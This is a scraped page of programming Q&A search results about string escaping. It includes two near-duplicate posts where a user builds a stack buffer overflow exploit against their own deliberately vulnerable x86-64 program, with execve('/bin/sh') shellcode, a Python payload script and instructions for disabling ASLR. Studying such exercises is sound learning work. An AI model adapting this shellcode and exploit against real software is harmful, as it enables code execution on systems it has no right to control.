Search Results

Search found 6073 results on 243 pages for 'shell escape'.

Page 55/243 | < Previous Page | 51 52 53 54 55 56 57 58 59 60 61 62  | Next Page >

  • Escaped International characters?

    - by FFish
    I am looking at some PHP code where there are translation strings. For French there are characters that I have never seen before and I am asking if someone could shed a light. These strings are used as HTML output, but also as body text to send emails. È = é Ë = è ‡ = à Í = ê ...

    Read the article

  • Ruby -- looking for some sort of "Regexp unescape" method

    - by RubyNoobie
    I have a bunch of strings that appear to have been double-escaped -- eg, I have "\\014\"\\000\"\\016smoothing\"\\011mean\"\\022color\"\\011zero@\\016" but I want "\014"\000"\016smoothing"\011mean"\022color"\011zero@\016" Is there a method I can use to unescape them? I imagine that I could make a regex to remove 1 backslash from every consecutive n backslashes, but I don't have a lot of regex experience and it seems there ought to be a "more elegant" way to do it. For example, when I puts MyString it displays the output I'd like, but I don't know how I might capture that into a variable. Thanks! Edited to add context: I have this class that is being used to marshal / restore some stuff, but when I restore some old strings it spits out a type error which I've determined is because they weren't -- for some inexplicable reason -- stored as base64. They instead appear to be 'double-escaped', when I need them to be 'single-escaped' to get restored. require 'base64' class MarshaledStuff < ActiveRecord::Base validates_presence_of :marshaled_obj def contents obj = self.marshaled_obj return Marshal.restore(Base64.decode64(obj)) end def contents=(newcontents) self.marshaled_obj = Base64.encode64(Marshal.dump(newcontents)) end end

    Read the article

  • windows C system call with spaces in command

    - by myforwik
    I cannot make system calls with spaces in the names and parameters. For example: system("c:\program files\something\example.exe c:\my files\example.txt"); I have tried escaping in every way I know how, and NOTHING works. I have tried: system("\"c:\program files\something\example.exe\" \"c:\my files\example.txt\""); and system("c:\program^ files\something\example.exe c:\my^ files\example.txt"); Neither work. I still get 'c:\program' is not a recongnised internal or external command This is really driving me mad... I need to call and pass parameters that have spaces in them. I cannot use the short notation for reasons I won't go into. I have tried with ' quotes instead of " quotes, still doesn't work. I have tried putting quotes around the whole thing and quotes around the spaces and that doesn't work. Does anyone know how to do it properly?

    Read the article

  • Decoding mysql_real_escape_string() for outputting HTML

    - by Peter
    I'm trying to protect myself from sql injection and am using: mysql_real_escape_string($string); When posting HTML it looks something like this: <span class="\&quot;className\&quot;"> <p class="\&quot;pClass\&quot;" id="\&quot;pId\&quot;"></p> </span> I'm not sure how many other variations real_escape_string adds so don't want to just replace a few and miss others... How do I "decode" this back into correctly formatted HTML, with something like: html_entity_decode(stripslashes($string));

    Read the article

  • mysql_real_escape_string() just makes an empty string?

    - by James P
    I am using a jQuery AJAX request to a page called like.php that connects to my database and inserts a row. This is the like.php code: <?php // Some config stuff define(DB_HOST, 'localhost'); define(DB_USER, 'root'); define(DB_PASS, ''); define(DB_NAME, 'quicklike'); $link = mysql_connect(DB_HOST, DB_USER, DB_PASS) or die('ERROR: ' . mysql_error()); $sel = mysql_select_db(DB_NAME, $link) or die('ERROR: ' . mysql_error()); $likeMsg = mysql_real_escape_string(trim($_POST['likeMsg'])); $timeStamp = time(); if(empty($likeMsg)) die('ERROR: Message is empty'); $sql = "INSERT INTO `likes` (like_message, timestamp) VALUES ('$likeMsg', $timeStamp)"; $result = mysql_query($sql, $link) or die('ERROR: ' . mysql_error()); echo mysql_insert_id(); mysql_close($link); ?> The problematic line is $likeMsg = mysql_real_escape_string(trim($_POST['likeMsg']));. It seems to just return an empty string, and in my database under the like_message column all I see is blank entries. If I remove mysql_real_escape_string() though, it works fine. Here's my jQuery code if it helps. $('#like').bind('keydown', function(e) { if(e.keyCode == 13) { var likeMessage = $('#changer p').html(); if(likeMessage) { $.ajax({ cache: false, url: 'like.php', type: 'POST', data: { likeMsg: likeMessage }, success: function(data) { $('#like').unbind(); writeLikeButton(data); } }); } else { $('#button_container').html(''); } } }); All this jQuery code works fine, I've tested it myself independently. Any help is greatly appreciated, thanks.

    Read the article

  • Java: Ignoring escapes when parsing XML

    - by Personman
    I'm using a DocumentBuilder to parse XML files. However, the specification for the project requires that within text nodes, strings like " and < be returned literally, and not turned into the corresponding ASCII values. A previous similar question, http://stackoverflow.com/questions/1979785/read-escaped-quote-as-escaped-quote-from-xml, received one answer that seems to be specific to Apache, and another that appears to simply not not do what it says it does. I'd love to be proven wrong on either count, however :) For reference, here is some code: file = new File(fileName); DocBderFac = DocumentBuilderFactory.newInstance(); DocBder = DocBderFac.newDocumentBuilder(); doc = DocBder.parse(file); NodeList textElmntLst = doc.getElementsByTagName(text); Element textElmnt = (Element) textElmntLst.item(0); NodeList txts = textElmnt.getChildNodes(); String txt = ((Node) txts.item(0)).getNodeValue(); System.out.println(txt); I would like that println() to produce things like &quot;3&gt;2&quot; instead of "3>2" which is what currently happens. Thanks!

    Read the article

  • mysqli real_escape_string problem

    - by tridat
    When im inserting to the database on my dev server the text goes in fine, for example "that's" is "that's" in the db. when uploading the exact same code to production server (hosted on a reseller account at bluehost) "that's" becomes "that\'s", im not double escaping, its exactly the same code, what could be the issue here?

    Read the article

  • Store data in DB as is, or escaped?

    - by Yegor
    Whats a better way to store textual data, such as comments, user profile fields that require them to type something in, etc? Store the escaped data right away (using htmlspecialchars in php for example), or put it thru the same function before its echoed out?

    Read the article

  • Problem when reading backslash in Prolog

    - by Jerry
    I'm writing a lexer in Prolog which will be used as a part of functional language interpreter. Language spec allows expressions like for example let \x = x + 2; to occur. What I want lexer to do for such input is to "return": [tokLet, tokLambda, tokVar(x), tokEq, tokVar(x), tokPlus, tokNumber(2), tokSColon] and the problem is, that Prolog seems to ignore the \ character and "returns" the line written above except for tokLambda. One approach to solve this would be to somehow add second backslash before/after every occurrence of one in the program code (because everything works fine if I change the original input to let \\x = x + 2;) but I don't really like it. Any ideas?

    Read the article

  • Escaping quotes twice in PHP

    - by Genadinik
    Hello, I have a complicated form where I first have to take some _GET parameters and obviously I have to do a mysql_real_escape_string() on them since I look stuff up in the database with them. Them problem for me is after the initial db lookup. When the user submits a form, I send them along as a _POST request and obviously have to do this mysql_real_escape_string call again just in case someone tries to hack my site with a faked form submission. Then the problem I have is the arguments are escaped twice and my queries begin to look strange like this: select field1 , field2 , from my_table where some_id = \'.$lookup_id.\' ... So the system seems to be adding \' and it is messing me up :) Also, in my other forms I have not seen such behavior. Any ideas on what may be causing this? One weird thing is that I tried to send unescaped parameters to the post, and the same problem happens. That is a clue, but not a sufficient one for me. :( Thanks, Alex

    Read the article

  • Why does this properly escaped SQL query fail?

    - by Jason Rhodes
    Here's the query: INSERT INTO jobemails (jobid, to, subject, message, headers, datesent) VALUES ('340', '[email protected]', 'We\'ve received your request for a photo shoot called \'another\'.', 'message', 'headers', '2010-04-22 15:55:06') The datatypes are all correct, it always fails at the subject, so it must be how I'm escaping the values, I assume. I'm sure one of you will see my idiot mistake right away. A little help?

    Read the article

  • Unicode escaping in C/C++

    - by Geo
    Hi guys! I'm having a dispute with a colleague of mine. She says that the following: char* a = "\x000aaxz"; will/can be seen by the compiler as "\x000aa". I do not agree with her, as I think you can have a maximum number of 4 hex characters after the \x. Can you have more than 4 hex chars? Who is right here?

    Read the article

  • mysql_real_escape_string & slashes (again, oh yes)

    - by Fizzadar
    Righto, firstly magic quotes & runtime are disabled correctly in php.ini, and confirmed by phpinfo(). PHP version: 5.3.4 MySQL version: 5.1.52 I'm only use mysql_real_escape_string on the data, after htmlspecialchars and a trim, that's all the data cleaning on the variable. Yet, when I submit a single quote, the slash remains in the database. When running mysql_query I'm using "' . $var . '", although in the past this hasn't changed anything (could be due to the double quotes?). Any ideas? and please don't tell me about PDO/prepared statements, I'm aware of them and I have my reasons for doing it this way. Thanks!

    Read the article

  • mysql_real_escape more than once

    - by Aran
    I was just wondering whether it makes a difference if I mysql_real_escape data more than once? So if I escaped data in one part of my website, and then again in another part of code. Would this be a problem? Or make a difference?

    Read the article

  • How to change file managers "files" icon to nice "nautilus shell" icon in Ubuntu 12.04?

    - by Ivan Ivanov
    I've attached Nautilus to Unity launcher in Ubuntu 12.04. In Ubuntu 12.04 the default "Files" icon for Nautilus file manager is not as pretty as a "Nautilus Shell" icon. But when I search in Dash for Nautilus it gives "Files" link to Nautilus, which has grey and quite plain file-cabinet icon. How do I change this grey file cabinet icon to the Nautilus' shell icon, which suits well to my icon theme?

    Read the article

  • Gnome Shell has turned into Gnome Classic (no effects) after installing fglrx.

    - by Chintan Parikh
    For some reason, I can't get Gnome Shell working after installing fglrx. When I select Gnome Shell in the profile, it just goes to Gnome Classic (No effects). A few other issues: GDM has turned into something that looks a lot more fancy (not sure what it is) Selecting System Default in the profile section just gives me a blank screen (not Unity) When I drag a window around I get laggy windows-esque shadows Oh and I'm on Ubuntu 12.10 with an AMD Radeon HD 6540 G2 graphics card

    Read the article

  • what TERM to use to get rid of color escape codes?

    - by slivu
    Is there a way to get rid of escape codes in terminal output? Say even if the script are sending that codes they are ignored by terminal and text displayed as is, without colors, bolds etc. I need to display terminal output on a HTML page. For now i'm using javascript to remove escape codes, but it becomes clunky cause i receive output by chars, and have to wait until all content received then update it, leading in weird effects.

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • Cannot spawn an erlang supervisor from the shell.

    - by drfloob
    I've implemented a gen_server and supervisor: test_server and test_sup. I want to test them from the shell/CLI. I've written their start_link functions such that their names are registered locally. I've found that I can spawn the test_server from the command line just fine, but a spawned test_sup does nothing whatsoever. Why is this? For example, I can spawn a test_server by executing: 1> spawn(test_server, start_link, []). <0.39.0> 2> registered(). [...,test_server,...] I can interact with the server, and everything appears fine. However, if I try to do the same thing with test_sup, no new names/Pids are registered, and it looks like my test_server was not spawned at all. I'd assume I coded an error in my supervisor, but this method of starting my supervisor works perfectly fine: 1> {ok, Pid}= test_sup:start_link([]). {ok, <0.39.0>} 2> unlink(Pid). true 3> registered(). [...,test_server,test_sup,...] Why is it that I can spawn a gen_server but not a supervisor?

    Read the article

< Previous Page | 51 52 53 54 55 56 57 58 59 60 61 62  | Next Page >